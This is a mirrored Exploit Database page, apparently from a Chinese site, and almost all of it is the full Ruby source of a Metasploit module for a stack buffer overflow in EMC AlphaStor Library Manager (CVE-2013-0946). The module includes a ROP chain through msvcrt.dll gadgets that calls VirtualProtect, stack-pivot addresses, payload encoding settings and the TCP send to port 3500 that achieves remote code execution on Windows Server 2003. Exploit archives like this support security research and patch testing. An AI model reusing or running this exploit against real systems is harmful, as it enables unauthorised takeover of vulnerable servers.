EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)

• Exploit Database
• 113 阅读

• 作者： James Fitts
  日期： 2017-09-14
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42719/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126

  require &apos;msf/core&apos;   class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking   include Msf::Exploit::Remote::Tcp   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;EMC AlphaStor Library Manager Opcode 0x4f&apos;, &apos;Description&apos;=> %q{ This module exploits a stack based buffer overflow found in EMC Alphastor Library Manager version < 4.0 build 910. The overflow is triggered due to a lack of sanitization of the pointers used for two strcpy functions. }, &apos;Author&apos; => [ &apos;james fitts&apos; ], &apos;License&apos;=> MSF_LICENSE, &apos;References&apos; => [ [ &apos;URL&apos;, &apos;http://www.zerodayinitiative.com/advisories/ZDI-14-029/&apos; ], [ &apos;CVE&apos;, &apos;2013-0946&apos; ] ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;thread&apos;, &apos;wfsdelay&apos; => 1000 }, &apos;Privileged&apos; => true, &apos;Payload&apos;=> { &apos;Space&apos; => 160, &apos;DisableNops&apos; => &apos;true&apos;, &apos;BadChars&apos; => "\x00\x09\x0a\x0d", &apos;StackAdjustment&apos; => -404, &apos;PrependEncoder&apos; => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", &apos;Compat&apos;=> { &apos;SymbolLookup&apos; => &apos;ws2ord&apos;, }, }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Windows Server 2003 SP2 EN&apos;, { # msvcrt.dll # add esp, 0c/ retn &apos;Ret&apos; => 0x77bdda70, } ], ], &apos;DefaultTarget&apos;=> 0, &apos;DisclosureDate&apos; => &apos;Feb 13 2014&apos;))   register_options( [ Opt::RPORT(3500) ], self.class ) end   def exploit connect   p ="\x90" * 8 p << payload.encoded   # msvcrt.dll # 96 bytes rop = [ 0x77bb2563, # pop eax/ retn 0x77ba1114, # ptr to kernel32!virtualprotect 0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn 0xfeedface, 0x77bb0c86, # xchg eax, esi/ retn 0x77bc9801, # pop ebp/ retn 0x77be2265, 0x77bb2563, # pop eax/ retn 0x03C0990F, 0x77bdd441, # sub eax, 3c0940fh/ retn 0x77bb48d3, # pop eax/ retn 0x77bf21e0, 0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn 0x77bbfc02, # pop ecx/ retn 0x77bef001, 0x77bd8c04, # pop edi/ retn 0x77bd8c05, 0x77bb2563, # pop eax/ retn 0x03c0984f, 0x77bdd441, # sub eax, 3c0940fh/ retn 0x77bb8285, # xchg eax, edx/ retn 0x77bb2563, # pop eax/ retn 0x90909090, 0x77be6591, # pushad/ add al, 0efh/ retn ].pack("V*")   buf = Rex::Text.pattern_create(514) buf[0, 2] ="O~" # opcode buf[13, 4] = [0x77bdf444].pack(&apos;V&apos;) # stack pivot 52 buf[25, 4] = [target.ret].pack(&apos;V&apos;) # stack pivot 12 buf[41, 4] = [0x77bdf444].pack(&apos;V&apos;) # stack pivot 52 buf[57, 4] = [0x01167e20].pack(&apos;V&apos;) # ptr buf[69, rop.length] = rop buf[165, 4] = [0x909073eb].pack(&apos;V&apos;) # jmp $+117 buf[278, 4] = [0x0116fd59].pack(&apos;V&apos;) # ptr buf[282, p.length] = p buf[512, 1] = "\x00"   # junk buf << "AAAA" buf << "BBBB" buf << "CCCC" buf << "DDDD"   print_status("Trying target %s..." % target.name)   sock.put(buf)   handler disconnect end   end